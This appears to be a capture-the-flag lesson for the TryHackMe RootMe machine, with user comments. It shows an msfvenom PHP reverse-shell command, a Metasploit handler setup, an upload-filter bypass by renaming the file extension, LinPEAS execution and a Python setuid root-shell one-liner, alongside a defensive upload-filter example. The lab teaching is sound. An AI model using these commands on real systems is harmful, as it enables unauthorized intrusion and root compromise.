Try Hack Me > RootMe
GTFOBins > Collects all the Linux binaries so they can be leveraged for privilege escalation.
In the exciting world of cybersecurity, the ability to escalate privileges on a Linux system can be a powerful and necessary tool. In this lesson, we will address how to use tools to accomplish this task, specifically Metasploit and LinPEAS. We will explore each step in a clear manner, providing a thorough understanding of the techniques employed.
To begin, it is important to understand the concept of privilege escalation. It refers to the process by which an unprivileged user acquires full access to a system, allowing them to perform restricted operations. We start with the analysis of the virtual system, for which we will use a TryHackMe machine, specifically the RootMe machine.
Starting the virtual machine: We begin by starting the TryHackMe virtual machine and obtaining the necessary IP address.
Environment configuration: We use Kali Linux to browse the virtual machine and explore the available routes and services. Tools like Nmap and DirBuster are essential for this preliminary information-gathering process.
The next essential step is to obtain a shell on the system. A shell allows us to execute remote commands on the server. To achieve this, different paths can be followed:
File upload: Through a web application observable from the virtual machine, we find a vulnerable point that allows file uploads. Exploiting this vulnerability is crucial.
Creation of a malicious PHP file: We use Metasploit and its MSFVenom tool to create a PHP file. This file, when executed, will provide us with a shell connection.
msfvenom -p php/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw > shell.php
Upload the file and bypass protections: If there is a simple filter that blocks PHP files, we rename the file to shell.phtml or shell.php5 to bypass these restrictions.
Connection with Metasploit: We configure a handler in Metasploit to wait for incoming connections.
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST <YOUR_IP>
set LPORT 4444
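From the defender's side, the rename in the upload step works because the filter is a denylist with one entry. The following added example (not part of the original lesson or of the RootMe application) models that weak filter next to an allowlist check; the image-only upload policy, the function names and the sample file names are assumptions made for illustration.

```python
import os
import secrets
from typing import Optional

# Constructed model of the weak filter: a denylist holding only ".php".
BLOCKED = {".php"}

def weak_filter(filename: str) -> bool:
    """Return True when the upload is accepted (denylist on the last extension)."""
    return os.path.splitext(filename)[1] not in BLOCKED

# Hardened check. Assumption: the feature only needs to accept images.
ALLOWED = {".jpg", ".jpeg", ".png", ".gif"}
MAGIC = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}

def strict_filter(filename: str, content: bytes) -> Optional[str]:
    """Return a server-generated storage name, or None when the upload is rejected."""
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or "\x00" in base or base.startswith("."):
        return None
    parts = base.lower().split(".")
    # Exactly one extension, and it must be on the allowlist.
    # This rejects shell.phtml, shell.php5, shell.PHP and shell.php.jpg alike.
    if len(parts) != 2 or "." + parts[1] not in ALLOWED:
        return None
    # The leading bytes must match a known image signature.
    kind = next((ext for sig, ext in MAGIC.items() if content.startswith(sig)), None)
    if kind is None:
        return None
    # Never reuse the client-supplied name: the stored extension is chosen by
    # the server, so the web server has no reason to hand the file to PHP.
    return secrets.token_hex(16) + kind

# Constructed sample uploads: (client file name, first bytes of the body).
SAMPLES = [
    ("shell.php", b"<?php"),
    ("shell.phtml", b"<?php"),
    ("shell.php5", b"<?php"),
    ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),
]

def compare():
    """Return (name, accepted by weak filter, accepted by strict filter) per sample."""
    return [(n, weak_filter(n), strict_filter(n, c) is not None) for n, c in SAMPLES]
```

The allowlist is one layer; storing uploads outside the web root, or in a directory where the server does not execute scripts, covers the case where a crafted file still passes the content check.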
With a Meterpreter shell already set up, we move on to analyze the system for privilege escalation paths using LinPEAS.
Upload LinPEAS to the system: We use Meterpreter to transfer and run the LinPEAS script, which will scan the system for vulnerabilities.
upload /home/kali/Desktop/linpeas.sh /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh
Identify escalation vectors: LinPEAS provides a list of possible escalation vectors, including binaries that can be run with elevated privileges.
GTFOBins is an excellent source that details how to use Linux binaries to escalate privileges. When the Python binary is identified as one of those binaries:
GTFOBins query: we look for the specific binary to obtain the escalation command. For Python, the following command allows us to obtain a shell with root privileges.
python -c 'import os; os.setuid(0); os.system("/bin/sh")'
Execute in the shell: In our shell obtained through Meterpreter, we execute the command and verify the user change.
whoami
If the execution is successful, the system should indicate that we are now root.
This systematic approach is not only a great example of how to deal with ethical cybersecurity situations, but also provides the basis for further exploration and learning in this fascinating field.
Contributions 4
https://www.revshells.com/ this page can also be helpful for creating a reverse shell, like what he did for the PHP file
use exploit/multi/handler